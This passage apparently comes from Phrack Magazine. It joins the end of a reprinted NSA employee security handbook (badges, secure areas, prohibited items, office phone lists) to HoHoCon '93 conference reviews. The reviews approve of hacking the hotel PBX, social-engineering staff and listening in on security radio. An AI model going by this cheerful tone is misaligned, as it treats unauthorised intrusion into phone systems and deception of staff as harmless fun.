  7500. protection you give your wallet or your credit cards.  DO NOT write your
  7501. Personal Identification Number on your badge.
  7502.  
  7503. If you plan to be away from the Agency for a period of more than 30 days, your
  7504. badge should be left at the main Visitor Control Center which services your
  7505. facility.
  7506.  
  7507. Should you lose your badge, you must report the facts and circumstances
  7508. immediately to the Security Operations Center (SOC) (963-3371s/688-6911b) so
  7509. that your badge PIN can be deactivated in the Access Control Terminals.  In the
  7510. event that you forget your badge when reporting for duty, you may obtain a
  7511. "non-retention" Temporary Badge at the main Visitor Control Center which serves
  7512. your facility after a co-worker personally identifies your and your clearance
  7513. has been verified.
  7514.  
  7515. Your badge is to be used as identification only within NSA facilities or other
  7516. government installations where the NSA badge is recognized.  Your badge should
  7517. never be used outside of the NSA or other government facilities for the purpose
  7518. of personal identification.  You should obtain a Department of Defense
  7519. identification card from the Civilian Welfare Fund (CWF) if you need to
  7520. identify yourself as a government employee when applying for "government
  7521. discounts" offered at various commercial establishments.
  7522.  
  7523. Your badge color indicates your particular affiliation with NSA and your level
  7524. of clearance.  Listed below are explanations of the badge colors you are most
  7525. likely to see:
  7526.  
  7527.         Green (*)       Fully cleared NSA employees and certain military
  7528.                         assignees.
  7529.  
  7530.         Orange (*)      (or Gold) Fully cleared representative of other
  7531.                         government agencies.
  7532.  
  7533.         Black (*)       Fully cleared contractors or consultants.
  7534.  
  7535.         Blue            Employees who are cleared to the SECRET level while
  7536.                         awaiting completion of their processing for full
  7537.                         (TS/SI) clearance.  These Limited Interim Clearance
  7538.                         (LIC) employees are restricted to certain activities
  7539.                         while inside a secure area.
  7540.  
  7541.         Red             Clearance level is not specified, so assume the holder
  7542.                         is uncleared.
  7543.  
  7544. * - Fully cleared status means that the person has been cleared to the Top
  7545. Secret (TS) level and indoctrinated for Special Intelligence (SI).
  7546.  
  7547. All badges with solid color backgrounds (permanent badges) are kept by
  7548. individuals until their NSA employment or assignment ends.  Striped badges
  7549. ("non-retention" badges) are generally issued to visitors and are returned to
  7550. the Security Protective Officer upon departure from an NSA facility.
  7551.  
  7552. Area Control
  7553.  
  7554. Within NSA installations there are generally two types of areas,
  7555. Administrative and Secure.  An Administrative Area is one in which storage of
  7556. classified information is not authorized, and in which discussions of a
  7557. classified nature are forbidden.  This type of area would include the
  7558. corridors, restrooms, cafeterias, visitor control areas, credit union, barber
  7559. shop, and drugstore.  Since uncleared, non-NSA personnel are often present in
  7560. these areas, all Agency personnel must ensure that no classified information is
  7561. discussed in an Administrative Area.
  7562.  
  7563. Classified information being transported within Agency facilities must be
  7564. placed within envelopes, folders, briefcases, etc. to ensure that its contents
  7565. or classification markings are not disclosed to unauthorized persons, or that
  7566. materials are not inadvertently dropped enroute.
  7567.  
  7568. The normal operational work spaces within an NSA facility are designated Secure
  7569. Areas.  These areas are approved for classified discussions and for the storage
  7570. of classified material.  Escorts must be provided if it is necessary for
  7571. uncleared personnel (repairmen, etc.) to enter Secure Areas, an all personnel
  7572. within the areas must be made aware of the presence of uncleared individuals.
  7573. All unknown, unescorted visitors to Secure Areas should be immediately
  7574. challenged by the personnel within the area, regardless of the visitors'
  7575. clearance level (as indicated by their badge color).
  7576.  
  7577. The corridor doors of these areas must be locked with a deadbolt and all
  7578. classified information in the area must be properly secured after normal
  7579. working hours or whenever the area is unoccupied.  When storing classified
  7580. material, the most sensitive material must be stored in the most secure
  7581. containers.  Deadbolt keys for doors to these areas must be returned to the key
  7582. desk at the end of the workday.
  7583.  
  7584. For further information regarding Secure Areas, consult the Physical Security
  7585. Division (M51) or your staff Security Officer.
  7586.  
  7587. Items Treated As Classified
  7588.  
  7589. For purposes of transportation, storage and destruction, there are certain
  7590. types of items which must be treated as classified even though they may not
  7591. contain classified information.  Such items include carbon paper, vu-graphs,
  7592. punched machine processing cards, punched paper tape, magnetic tape, computer
  7593. floppy disks, film, and used typewriter ribbons.  This special treatment is
  7594. necessary since a visual examination does not readily reveal whether the items
  7595. contain classified information.
  7596.  
  7597. Prohibited Items
  7598.  
  7599. Because of the potential security or safety hazards, certain items are
  7600. prohibited under normal circumstances from being brought into or removed from
  7601. any NSA installation.  These items have been groped into two general classes.
  7602. Class I prohibited items are those which constitute a threat to the safety and
  7603. security of NSA/CSS personnel and facilities.  Items in this category include:
  7604.  
  7605.         a.  Firearms and ammunition
  7606.         b.  Explosives, incendiary substances, radioactive materials, highly
  7607.             volatile materials, or other hazardous materials
  7608.         c.  Contraband or other illegal substances
  7609.         d.  Personally owned photographic or electronic equipment including
  7610.             microcomputers, reproduction or recording devices, televisions or
  7611.             radios.
  7612.  
  7613. Prescribed electronic medical equipment is normally not prohibited, but
  7614. requires coordination with the Physical Security Division (M51) prior to being
  7615. brought into any NSA building.
  7616.  
  7617. Class II prohibited items are those owned by the government or contractors
  7618. which constitute a threat to physical, technical, or TEMPEST security.
  7619. Approval by designated organizational officials is required before these items
  7620. can be brought into or removed from NSA facilities.  Examples are:
  7621.  
  7622.         a.  Transmitting and receiving equipment
  7623.         b.  Recording equipment and media
  7624.         c.  Telephone equipment and attachments
  7625.         d.  Computing devices and terminals
  7626.         e.  Photographic equipment and film
  7627.  
  7628. A more detailed listing of examples of Prohibited Items may be obtained from
  7629. your Staff Security Officer or the Physical Security Division (M51).
  7630.  
  7631. Additionally, you may realize that other seemingly innocuous items are also
  7632. restricted and should not be brought into any NSA facility.  Some of these
  7633. items pose a technical threat; others must be treated as restricted since a
  7634. visual inspection does not readily reveal whether they are classified.  These
  7635. items include:
  7636.  
  7637.         a.  Negatives from processed film; slides; vu-graphs
  7638.         b.  Magnetic media such as floppy disks, cassette tapes, and VCR
  7639.             videotapes
  7640.         c.  Remote control devices for telephone answering machines
  7641.         d.  Pagers
  7642.  
  7643. Exit Inspection
  7644.  
  7645. As you depart NSA facilities, you will note another physical security
  7646. safeguard--the inspection of the materials you are carrying.  This inspection
  7647. of your materials, conducted by Security Protective Officers, is designed to
  7648. preclude the inadvertent removal of classified material.  It is limited to any
  7649. articles that you are carrying out of the facility and may include letters,
  7650. briefcases, newspapers, notebooks, magazines, gym bags, and other such items.
  7651. Although this practice may involve some inconvenience, it is conducted in your
  7652. best interest, as well as being a sound security practice.  The inconvenience
  7653. can be considerably reduced if you keep to a minimum the number of personal
  7654. articles that you remove from the Agency.
  7655.  
  7656. Removal Of Material From NSA Spaces
  7657.  
  7658. The Agency maintains strict controls regarding the removal of material from its
  7659. installations, particularly in the case of classified material.
  7660.  
  7661. Only under a very limited and official circumstances classified material be
  7662. removed from Agency spaces.  When deemed necessary, specific authorization is
  7663. required to permit an individual to hand carry classified material out of an NSA
  7664. building to another Secure Area.  Depending on the material and circumstances
  7665. involved, there are several ways to accomplish this.
  7666.  
  7667. A Courier Badge authorizes the wearer, for official purposes, to transport
  7668. classified material, magnetic media, or Class II prohibited items between NSA
  7669. facilities.  These badges, which are strictly controlled, are made available by
  7670. the Physical Security Division (M51) only to those offices which have specific
  7671. requirements justifying their use.
  7672.  
  7673. An Annual Security Pass may be issued to individuals whose official duties
  7674. require that they transport printed classified materials, information storage
  7675. media, or Class II prohibited items to secure locations within the local area.
  7676. Materials carried by an individual who displays this pass are subject to spot
  7677. inspection by Security Protective Officers or other personnel from the Office
  7678. of Security.  It is not permissible to use an Annual Security Pass for personal
  7679. convenience to circumvent inspection of your personal property by perimeter
  7680. Security Protective Officers.
  7681.  
  7682. If you do not have access to a Courier Badge and you have not been issued an
  7683. Annual Security Pass, you may obtain a One-Time Security Pass to remove
  7684. classified materials/magnetic media or admit or remove prohibited items from an
  7685. NSA installation.  These passes may be obtained from designated personnel
  7686. in your work element who have been given authority to issue them.  The issuing
  7687. official must also contact the Security Operations Center (SOC) to obtain
  7688. approval for the admission or removal of a Class I prohibited item.
  7689.  
  7690. When there is an official need to remove government property which is not
  7691. magnetic media, or a prohibited or classified item, a One-Time Property Pass is
  7692. used.  This type of pass (which is not a Security Pass) may be obtained from
  7693. your element custodial property officer.  A Property Pass is also to be used
  7694. when an individual is removing personal property which might be reasonably be
  7695. mistaken for unclassified Government property.  This pass is surrendered to the
  7696. Security Protective Officer at the post where the material is being removed.
  7697. Use of this pass does not preclude inspection of the item at the perimeter
  7698. control point by the Security Protective Officer or Security professionals to
  7699. ensure that the pass is being used correctly.
  7700.  
  7701. External Protection Of Classified Information
  7702.  
  7703. On those occasions when an individual must personally transport classified
  7704. material between locations outside of NSA facilities, the individual who is
  7705. acting as the courier must ensure that the material receives adequate
  7706. protection. Protective measures must include double wrapping and packaging of
  7707. classified information, keeping the material under constant control, ensuring
  7708. the presence of a second appropriately cleared person when necessary, and
  7709. delivering the material to authorized persons only.  If you are designated as a
  7710. courier outside the local area, contact the Security Awareness Division (M56)
  7711. for your courier briefing.
  7712.  
  7713. Even more basic than these procedures is the individual security responsibility
  7714. to confine classified conversations to secure areas.  Your home, car pool, and
  7715. public places are not authorized areas to conduct classified discussions--even
  7716. if everyone involved in he discussion possesses a proper clearance and
  7717. "need-to-know."  The possibility that a conversation could be overheard by
  7718. unauthorized persons dictates the need to guard against classified discussions
  7719. in non-secure areas.
  7720.  
  7721. Classified information acquired during the course of your career or assignment
  7722. to NSA may not be mentioned directly, indirectly, or by suggestion in personal
  7723. diaries, records, or memoirs.
  7724.  
  7725. Reporting Loss Or Disclosure Of Classified Information
  7726.  
  7727. The extraordinary sensitivity of the NSA mission requires the prompt reporting
  7728. of any known, suspected, or possible unauthorized disclosure of classified
  7729. information, or the discovery that classified information may be lost, or is not
  7730. being afforded proper protection.  Any information coming to your attention
  7731. concerning the loss or unauthorized disclosure of classified information should
  7732. be reported immediately to your supervisor, your Staff Security Officer, or the
  7733. Security Operations Center (SOC).
  7734.  
  7735. Use Of Secure And Non-Secure Telephones
  7736.  
  7737. Two separate telephone systems have been installed in NSA facilities for use in
  7738. the conduct of official Agency business:  the secure telephone system (gray
  7739. telephone) and the outside, non-secure telephone system (black telephone).  All
  7740. NSA personnel must ensure that use of either telephone system does not
  7741. jeopardize the security of classified information.
  7742.  
  7743. The secure telephone system is authorized for discussion of classified
  7744. information.  Personnel receiving calls on the secure telephone may assume that
  7745. the caller is authorized to use the system.  However, you must ensure that the
  7746. caller has a "need-to-know" the information you will be discussing.
  7747.  
  7748. The outside telephone system is only authorized for unclassified official
  7749. Agency business calls.  The discussion of classified information is not
  7750. permitted on this system.  Do not attempt to use "double-talk" in order to
  7751. discuss classified information over the non-secure telephone system.
  7752.  
  7753. In order to guard against the inadvertent transmission of classified
  7754. information over a non-secure telephone, and individual using the black
  7755. telephone in an area where classified activities are being conducted must
  7756. caution other personnel in the area that the non-secure telephone is in use.
  7757. Likewise, you should avoid using the non-secure telephone in the vicinity of a
  7758. secure telephone which is also in use.
  7759.  
  7760. HELPFUL INFORMATION
  7761.  
  7762. Security Resources
  7763.  
  7764. In the fulfillment of your security responsibilities, you should be aware that
  7765. there are many resources available to assist you.  If you have any questions or
  7766. concerns regarding security at NSA or your individual security
  7767. responsibilities, your supervisor should be consulted.  Additionally, Staff
  7768. Security Officers are appointed to the designated Agency elements to assist
  7769. these organizations in carrying out their security responsibilities.  There is
  7770. a Staff Security Officer assigned to each organization; their phone numbers are
  7771. listed at the back of this handbook.  Staff Security Officers also provide
  7772. guidance to and monitor the activities of Security Coordinators and Advisors
  7773. (individuals who, in addition to their operational duties within their
  7774. respective elements, assist element supervisors or managers in discharging
  7775. security responsibilities).
  7776.  
  7777. Within the Office of Security, the Physical Security Division (M51) will offer
  7778. you assistance in matters such as access control, security passes, clearance
  7779. verification, combination locks, keys, identification badges, technical
  7780. security, and the Security Protective Force.  The Security Awareness Division
  7781. (M56) provides security guidance and briefings regarding unofficial foreign
  7782. travel, couriers, special access, TDY/PCS, and amateur radio activities.  The
  7783. Industrial and Field Security Division (M52) is available to provide security
  7784. guidance concerning NSA contractor and field site matters.
  7785.  
  7786. The Security Operations Center (SOC) is operated by two Security Duty Officers
  7787. (SDOs), 24 hours a day, 7 days a week.  The SDO, representing the Office of
  7788. Security, provides a complete range of security services to include direct
  7789. communications with fire and rescue personnel for all Agency area facilities.
  7790. The SDO is available to handle any physical or personnel problems that may
  7791. arise, and if necessary, can direct your to the appropriate security office
  7792. that can assist you.  After normal business hours, weekends, and holidays, the
  7793. SOC is the focal point for all security matters for all Agency personnel and
  7794. facilities (to include Agency field sites and contractors).  The SOC is located
  7795. in Room 2A0120, OPS 2A building and the phone numbers are 688-6911(b),
  7796. 963-3371(s).
  7797.  
  7798. However, keep in mind that you may contact any individual or any division
  7799. within the Office of Security directly.  Do not hesitate to report any
  7800. information which may affect the security of the Agency's mission, information,
  7801. facilities or personnel.
  7802.  
  7803. Security-Related Services
  7804.  
  7805. In addition to Office of Security resources, there are a number of
  7806. professional, security-related services available for assistance in answering
  7807. your questions or providing the services which you require.
  7808.  
  7809. The Installations and Logistics Organization (L) maintains the system for the
  7810. collection and destruction of classified waste, and is also responsible for the
  7811. movement and scheduling of material via NSA couriers and the Defense Courier
  7812. Service (DCS).  Additionally, L monitors the proper addressing, marking, and
  7813. packaging of classified material being transmitted outside of NSA; maintains
  7814. records pertaining to receipt and transmission of controlled mail; and issues
  7815. property passes for the removal of unclassified property.
  7816.  
  7817. The NSA Office of Medical Services (M7) has a staff of physicians, clinical
  7818. psychologists and an alcoholism counselor.  All are well trained to help
  7819. individuals help themselves in dealing with their problems.  Counseling
  7820. services, with referrals to private mental health professionals when
  7821. appropriate, are all available to NSA personnel.  Appointments can be obtained
  7822. by contacting M7 directly.  When an individual refers himself/herself, the
  7823. information discussed in the counseling sessions is regarded as privileged
  7824. medical information and is retained exclusively in M7 unless it pertains to the
  7825. national security.
  7826.  
  7827. Counselling interviews are conducted by the Office of Civilian Personnel (M3)
  7828. with any civilian employee regarding both on and off-the-job problems.  M3 is
  7829. also available to assist all personnel with the personal problems seriously
  7830. affecting themselves or members of their families.  In cases of serious
  7831. physical or emotional illness, injury, hospitalization, or other personal
  7832. emergencies, M3 informs concerned Agency elements and maintains liaison with
  7833. family members in order to provide possible assistance.  Similar counselling
  7834. services are available to military assignees through Military Personnel (M2).
  7835.  
  7836. GUIDE TO SECURITY
  7837.  
  7838. M51 PHYSICAL SECURITY 963-6651s/688-8293b (FMHQ)
  7839. 968-8101s/859-6411b (FANX)
  7840.  
  7841. CONFIRM and badges              Prohibited Items
  7842. (963-6611s/688-7411b)
  7843. Locks, keys, safes and alarms   SOC (963-3371s/688-6911b)
  7844. Security/vehicle passes         NSA facility protection and compliance
  7845. Visitor Control
  7846. Inspections
  7847. Red/blue seal areas             New Construction
  7848. Pass Clearances (963-4780s/688-6759b)
  7849.  
  7850. M52 INDUSTRIAL AND FIELD SECURITY
  7851. 982-7918s/859-6255b
  7852.  
  7853. Security at contractor field site facilities
  7854. Verification of classified mailing addresses for contractor facilities
  7855.  
  7856. M53 INVESTIGATIONS 982-7914s/859-6464b
  7857.  
  7858. Personnel Interview Program (PIP)       Reinvestigations
  7859. Military Interview Program (MIP)        Special investigations
  7860.  
  7861. M54 COUNTERINTELLIGENCE 982-7832s/859-6424b
  7862.  
  7863. Security counterintelligence analysis   Security compromises
  7864.  
  7865. M55 CLEARANCES 982-7900s/859-4747b
  7866.  
  7867. Privacy Act Officer (For review of security files)      Continued SCI access
  7868. Contractor/applicant processing                         Military access
  7869.  
  7870. M56 SECURITY AWARENESS 963-3273s/688-6535b
  7871.  
  7872. Security indoctrinations/debriefings            Embassy visits
  7873. Associations with foreign nationals             Briefings (foreign travel,
  7874. Security Week                                     ham radio, courier,
  7875. Security posters, brochures, etc.                 LIC, PCS, TDY,
  7876.                                                   special access, etc.)
  7877. Foreign travel approval
  7878. Military contractor orientation
  7879. Special Access Office (963-5466s/688-6353b)
  7880.  
  7881. M57 POLYGRAPH 982-7844s/859-6363b
  7882.  
  7883. Polygraph interviews
  7884.  
  7885. M509 MANAGEMENT AND POLICY STAFF 982-7885s/859-6350b
  7886.  
  7887. STAFF SECURITY OFFICERS (SSOs)
  7888.  
  7889. Element                 Room            Secure/Non-Secure
  7890. A                       2A0852B         963-4650/688-7044
  7891. B                       3W099           963-4559/688-7141
  7892. D/Q/J/N/U               2B8066G         963-4496/688-6614
  7893. E/M                     D3B17           968-8050/859-6669
  7894. G                       9A195           963-5033/688-7902
  7895. K                       2B5136          963-1978/688-5052
  7896. L                       SAB4            977-7230/688-6194
  7897. P                       2W091           963-5302/688-7303
  7898. R                       B6B710          968-4073/859-4736
  7899. S/V/Y/C/X               C2A55           972-2144/688-7549
  7900. T                       2B5040          963-4543/688-7364
  7901. W                       1C181           963-5970/688-7061
  7902.  
  7903. GUIDE TO SECURITY-RELATED SERVICES
  7904.  
  7905. Agency Anonymity                         968-8251/859-4381
  7906. Alcohol Rehabilitation Program          963-5420/688-7312
  7907. Cipher Lock Repair                      963-1221/688-7119
  7908. Courier Schedules (local)               977-7197/688-7403
  7909. Defense Courier Service                 977-7117/688-7826
  7910. Disposal of Classified Waste
  7911.         - Paper only                    972-2150/688-6593
  7912.         - Plastics, Metal, Film, etc    963-4103/688-7062
  7913. Locksmith                               963-3585/688-7233
  7914. Mail Dissemination and Packaging        977-7117/688-7826
  7915. Medical Center (Fort Meade)             963-5429/688-7263
  7916.         (FANX)                          968-8960/859-6667
  7917.         (Airport Square)                982-7800/859-6155
  7918. NSA/CSS Information Policy Division     963-5825/688-6527
  7919. Personnel Assistance
  7920.         - Civilian                      982-7835/859-6577
  7921.         - Air Force                     963-3239/688-7980
  7922.         - Army                          963-3739/688-6393
  7923.         - Navy                          963-3439/688-7325
  7924. Property Passes (unclassified material) 977-7263/688-7800
  7925. Psychological Services                  963-5429/688-7311
  7926.  
  7927. FREQUENTLY USED ACRONYMS/DESIGNATORS
  7928.  
  7929. ARFCOS  Armed Forces Courier Service (now known as DCS)
  7930. AWOL    Absent Without Leave
  7931. CAO     Classification Advisory Officer
  7932. COB     Close of Business
  7933. CWF     Civilian Welfare Fund
  7934. DCS     Defense Courier Service (formerly known as ARFCOS)
  7935. DoD     Department of Defense
  7936. EOD     Enter on Duty
  7937. FOUO    For Official Use Only
  7938. M2      Office of Military Personnel
  7939. M3      Office of Civilian Personnel
  7940. M5      Office of Security
  7941. M7      Office of Medical Services
  7942. NCS     National Cryptologic School
  7943. PCS     Permanent Change of Station
  7944. PIN     Personal Identification Number
  7945. Q43     Information Policy Division
  7946. SDO     Security Duty Officer
  7947. SOC     Security Operations Center
  7948. SPO     Security Protective Officer
  7949. SSO     Staff Security Officer
  7950. TDY     Temporary Duty
  7951. UFT     Unofficial Foreign Travel
  7952.  
  7953. A FINAL NOTE
  7954.  
  7955. The information you have just read is designed to serve as a guide to assist
  7956. you in the conduct of your security responsibilities.  However, it by no means
  7957. describes the extent of your obligation to protect information vital to the
  7958. defense of our nation.  Your knowledge of specific security regulations is part
  7959. of a continuing process of education and experience.  This handbook is designed
  7960. to provide he foundation of this knowledge and serve as a guide to the
  7961. development of an attitude of security awareness.
  7962.  
  7963. In the final analysis, security is an individual responsibility.  As a
  7964. participant in the activities of the National Security Agency organization, you
  7965. are urged to be always mindful of the importance of the work being accomplished
  7966. by NSA and of the unique sensitivity of the Agency's operations.
  7967.                               ==Phrack Magazine==
  7968.  
  7969.                  Volume Five, Issue Forty-Five, File 11 of 28
  7970.  
  7971. ****************************************************************************
  7972.  
  7973.                              Ho Ho Con Miscellany
  7974.  
  7975.  
  7976.   HoHoCon '93 review from the European point of view
  7977. <=====================================================>
  7978.  
  7979. This is Onkel Dittmeyer telling you his experiences at
  7980. the HoHoCon, which no-one really gives a @#*! about.
  7981. It might be fun reading anyway.
  7982.  
  7983. " Maybe I am just a lumpy coder, but at least my
  7984.   dad is not selling WOMEN'S SHOES. "
  7985.  
  7986.                                     - Guess Who
  7987.  
  7988. I arrived at the con one day too early, before anyone else
  7989. had showed up, and started striving through the
  7990. neighborhood. Well, this looked like fun. The Hilton and the
  7991. Super-8 were, along with a mall and a South Western Bell
  7992. building with light-at-night, wide open, overflowing
  7993. dumpsters situated between highways, a couple miles outside
  7994. of town. Cool. Used to Europe, where there is more public
  7995. transportation than cars on the street, I was kinda stuck in
  7996. there, so I spent my time chatting with the front desk clerk
  7997. of the motel ("Monty? Ahh, ya mean Monty from the hotel
  7998. security? Well, don't spread the word, he has a penis
  7999. problem.."). Everybody was able to confirm this a day
  8000. later during on a police raid, but let's save that for
  8001. later. So stuck between a WAL-MART ("SHOTGUNS! ON SALE! JUST
  8002. $99"), a movie theater and a cheap mall I spent this day
  8003. sipping complimentary tea at the front desk and watching
  8004. Wayne's World 2. ("A Unix Book. Cool.")
  8005.  
  8006. On the next day, all kinds of people started to flow in, and
  8007. I spent my time following around various people since I came
  8008. to the con alone, not seeing one familiar face around. I
  8009. bumped into Minor Threat and his trusty friend Mucho plus
  8010. a bunch of other guys trying to fix something with ToneLoc.
  8011. Walking around a little more, I ran into some dudes that
  8012. were busy hacking into the hotel's PBX using its 1200-bps
  8013. line.. Walking over to the Hilton, I found a tone in a wall
  8014. jack and called home. Still talking, hunger overcame me and
  8015. I decided to go to the mall and grab munchies. Walking past
  8016. the Hilton's pool, a kid was trying to fish his scanner out
  8017. of the water. Remember: A PRO-43 does NOT stay afloat! Later
  8018. that night, the whole place was pretty crowded already. It
  8019. was unreal. The lobby was crowded by at least two dozen
  8020. scanner-wielding kids, trying to find the frequency for the
  8021. hotel security. The guards must have been felt pretty
  8022. strange - each time they talked, something like five people
  8023. with frequency counters walked past them. Finally, the word
  8024. spread (466.025/825) and each time some guard started
  8025. talking, it was echoing back over everyone's scanner in a
  8026. two-mile range around the party place. I soon left the 3L3eT pIt
  8027. and hung out with AKA to play some stupid games ("Oh, there
  8028. is a calling card on the floor." "Where??" "You can't see it,
  8029. its eleet!") when we saw red and blue lights in front of the
  8030. Super-8 Motel. Three cop-cars had arrived, and they busted
  8031. an about 14-years old kid for scanning local numbers from
  8032. his motel room. While everybody stood around in front of the
  8033. room where they hold (or ABUSED) the kid, people were
  8034. thinking if this would be legal, arresting and squeezing
  8035. this kid with no lawyer and no parents around, they sped past
  8036. us with their victim, and someone told the kid that it was his
  8037. constitutional right to remain silent until he would get a
  8038. lawyer or at least a parent. And guess: The cops pulled the
  8039. guy out and told him that he should not stand around and
  8040. advise people about their constitutional rights. Quote:
  8041. " This is the manager, this is a police officer, I am the
  8042. security guard. LEAVE! " - "And I will NOT leave." Good
  8043. thing that someone was videotaping the whole thing. So much
  8044. action, and the con hadn't even started. Tired of so eViL
  8045. K-r0cKinG rAcIsM I stumbled to my room and fell asleep on
  8046. some standup comedy on TV. Tomorrow was the con!
  8047.  
  8048. The next morning around 9, I found the food court in the
  8049. mall crowded. It seemed like everybody on the con was going
  8050. to eat the last time for his life, or at least the last
  8051. time before the 6-hour Con-A-Thon started. Walking around in
  8052. the empty conference room, some hotel employee asked me
  8053. "HoHoCon? Is this like a Santa Claus meeting or something?"
  8054. Maybe it was just cause I wore a santa-hat. When Drunkfux
  8055. finally started the meeting one hour late I found myself
  8056. squashed in between some system administrator and another
  8057. guy from some three-letter-agency that typed everything that
  8058. was said into his laptop at something like 2.000.000
  8059. characters a second. Scared shitless, I was listening to the
  8060. events, still a little drowsy from very little sleep the
  8061. last night - I only remember Cap'n Crunch talking about
  8062. boxing in Russia (something that interested me, at least),
  8063. and the LOD members talking about some data preservation
  8064. project - if you are interested what in detail was talked
  8065. about, I'm sure Drunkfux will sell you the videotape for a
  8066. couple hundred $. In a break, he was selling merchandise,
  8067. and I think he didn't look more happy during the whole con
  8068. than in the moment everybody was waving with twenty-dollar
  8069. bills.. Phat pockets was also what the LOD guys were looking
  8070. for.. (just in case you don't know: They are collecting old
  8071. message boards and sell the printout for something like $35).
  8072.  
  8073. After this sellout session, I found a sign on the wall:
  8074. "hoho.con.com --->", and, in room 260 someone piled up an
  8075. enormous mass of equipment, including something like 4 UNIX
  8076. machines, a SLIP connection, 20" screens, PET's.. Plus, the
  8077. room was stacked with 30-40 people, and I mean STACKED. Most
  8078. people were wasting their time entering commands like
  8079. "mget /warez/eleet/hot/0-day/*.*" Sick of that, I grabbed a
  8080. bunch of people and we went trashing at SW-Bell around the
  8081. block, and whoops! we found a diagram like this:
  8082.  
  8083.  
  8084.      (Europe)             (Asia)           (Australia)
  8085.  
  8086.                       ______
  8087.                  ____|      |____
  8088.                 |                |
  8089.                 |   Texas   o <====== Austin
  8090.                  \             /
  8091.                   \           /
  8092.                    \_________/
  8093.  
  8094.       (North America)           (South America)
  8095.  
  8096. Now we know it: South Western Bell believes that Austin, Texas,
  8097. is the center of the world. Well, from the 17th to the 19th of
  8098. December, 1993, it was.
  8099.  
  8100.                 TEN THINGS I LEARNED AT HOHOCON '93
  8101.  
  8102.  1. Social-Engineering the front-desk clerk PAYS!
  8103.  2. If you drink 20 cups of complimentary tea, they WILL hassle you.
  8104.  3. If the guard hears his voice over your scanner, he WILL hassle you.
  8105.  4. If you sign on as CLIFF STOLL and pay cash, they WONT hassle you.
  8106.  5. Don't scan from a hotel room. But feel free to hack the PBX.
  8107.  6. Pizza Hut accepts all major credit cards.
  8108.  7. Austin, Texas, is the center of the universe.
  8109.  8. Some people really want room service in a Super-8 Motel.
  8110.  9. A radio shack is not lighter than water nor water-proof.
  8111. 10. Barney is a purple penis.
  8112.  
  8113. Shouts to Tr8or and SevenUp: Why didn't you join me?
  8114. Write to onkeld@ponton.hanse.de for further discussion....
  8115.  
  8116. ------------------------------------------------------------------------------
  8117.  
  8118. Conference Behavior - a Study of the Lame and the Damned
  8119.  
  8120. by Holistic Hacker/R2
  8121.  
  8122. [This little file was inspired by a talk Phantom Phreaker and I had at
  8123. HoHoCon last year, after some of the stupid shit that went on at it and
  8124. SummerCon.  The rough draft was written on my laptop on the flight back
  8125. from Austin.]
  8126.  
  8127. It seems some little kids are having problems figuring out how to act
  8128. at the various hacker cons around the country.  Hacking has nothing to do
  8129. with how many smoke bombs you can drop in the hotel or how many fire
  8130. extinguishers you steal.  If you lamers think that being away from mommy
  8131. for the first time in your life means that you can trash a hotel, then do
  8132. it.  By all means make it a local one first, so Mom and Dad can bail your
  8133. sorry ass out of jail.
  8134.  
  8135. I get really tired of going to a con and some little punk wants to play
  8136. eleet anarchist and then the cops show.  Cons are a chance to learn and/or
  8137. share info, see people, and have a good time.  Shit like what has happened
  8138. this last year just isn't needed.  All that comes out of stupid actions is
  8139. a bad rap on the "underground."  Some friends and I were in the hotel bar
  8140. Saturday night and the bartender was telling us how the hotel people were
  8141. really getting tired of the lame shit.
  8142.  
  8143. I was in one room Saturday night, swapping files and talking when the
  8144. smoke alarm went off at 3 AM or so.  I bet whoever did it got a real kick
  8145. seeing all of the people up, and he probably creamed his jeans when the
  8146. fire truck showed up.  Emergency personnel don't need to waste their time
  8147. on wannabe anarchist weenies, it isn't their job.
  8148.  
  8149. Another brilliant soul decided to set off one of the fire extinguishers
  8150. in the Super 8.  I saw other jerks trying to wake up the people on the top
  8151. two floors of the Hilton at 2 in the morning.  I saw another guy carrying two
  8152. extinguishers off, and he didn't look like hotel staff.  Another genius
  8153. tried cutting a hole in the vending machine with a glass cutter.  Just
  8154. because it isn't your property means you can trash it.  The fucked-up
  8155. elevator control panels, the damaged exit signs, etc. are costs the hotel
  8156. passes on to the customers and to us.  Even worse, when the word gets
  8157. out, the hotels don't want the cons back.  Why would they want to rent us
  8158. rooms, if they are just gonna get trashed?  If this is how you want cons
  8159. to be, then hold your own.
  8160.  
  8161. ------------------------------------------------------------------------------
  8162.  
  8163.      All typos are intentional.  The following summary of HohoCon 93
  8164.      is based solely upon my perceptions and are subject to the laws of
  8165.      physics.  Take these comments as you see them.
  8166.  
  8167.      By Frosty
  8168.  
  8169. First off, there was a $5 charge at the door.  This also entitled you to
  8170. partake in the raffle offered of lame-to-cool objects.  $100 would rig the
  8171. raffle in your favor.  One person walked away with a full //e system, and
  8172. another with a 486 system.
  8173.  
  8174. The Conference ---
  8175. ------------------
  8176.  
  8177. Bruce Sterling - A humorous talk that thrashed virii.  Informed us of the #1
  8178.                  anti-virii person in Russia, Dimitri.  Generously gave away
  8179.                  several copies of "The Hacker Crackdown" on disk.
  8180.                  Famous quote, "Information wants to be free."
  8181.  
  8182. Ray Kaplan - A humorous security consultant.  Wants to establish a site for
  8183.              security holes to be available.  Had a brief Q&A session.  Wants
  8184.              interaction between the security consultants and hackers.  Also
  8185.              stressed protecting information and privacy.
  8186.  
  8187. Douglas Barnes - Representatives from CypherPunks.  Works in cryptography.
  8188. Jim              Famous quote, "I want to talk to my lawyer."  Another
  8189.                  quote, "Hackers are requested to call between 9 and 5."
  8190.                  There are several Fidonet sites not allowing encrypted
  8191.                  messages to go through.  The liability decreases with a
  8192.                  site allowing encrypted messages.  ViaCrypt PGP is the
  8193.                  legal version of PGP.  Another quote, "A triple DES file
  8194.                  is as good as unbreakable."  Pushed the book "Applied
  8195.                  Cryptography."  Working on a digital Credit Union.
  8196.                  System Administrators are not responsible for passing
  8197.                  codes.  Quote, "The net perceives censorship and routes
  8198.                  around it."
  8199.  
  8200. Grayareas - Made a magazine plug.  Looking for information for the 'zine.
  8201.  
  8202. Damien Thorn - Works on the 'zine "Nuts and Bolts."  Talked about cellular
  8203.                tracking and hacking.  Informed that a cell hacking program
  8204.                can be obtained from mkl@nw.com.
  8205.  
  8206. Captain Crunch - Talked on the San Francisco raves and how they utilized
  8207. aka John Draper  networking and encryption to get their rave information out.
  8208.                  Gave history and information on hacking Soviet phones and
  8209.                  the KGB lines.
  8210.  
  8211. Simmion - Attendee from Moscow.  Stated there was no evidence of virii being
  8212.           highly prolific in Russia.  Almost all software is free in Russia.
  8213.           Most conferences in Russia are done by BBS's.  Russians can not
  8214.           afford the high software prices legally.
  8215.  
  8216. LOD/Comm - Project information on their Digital Archive project.
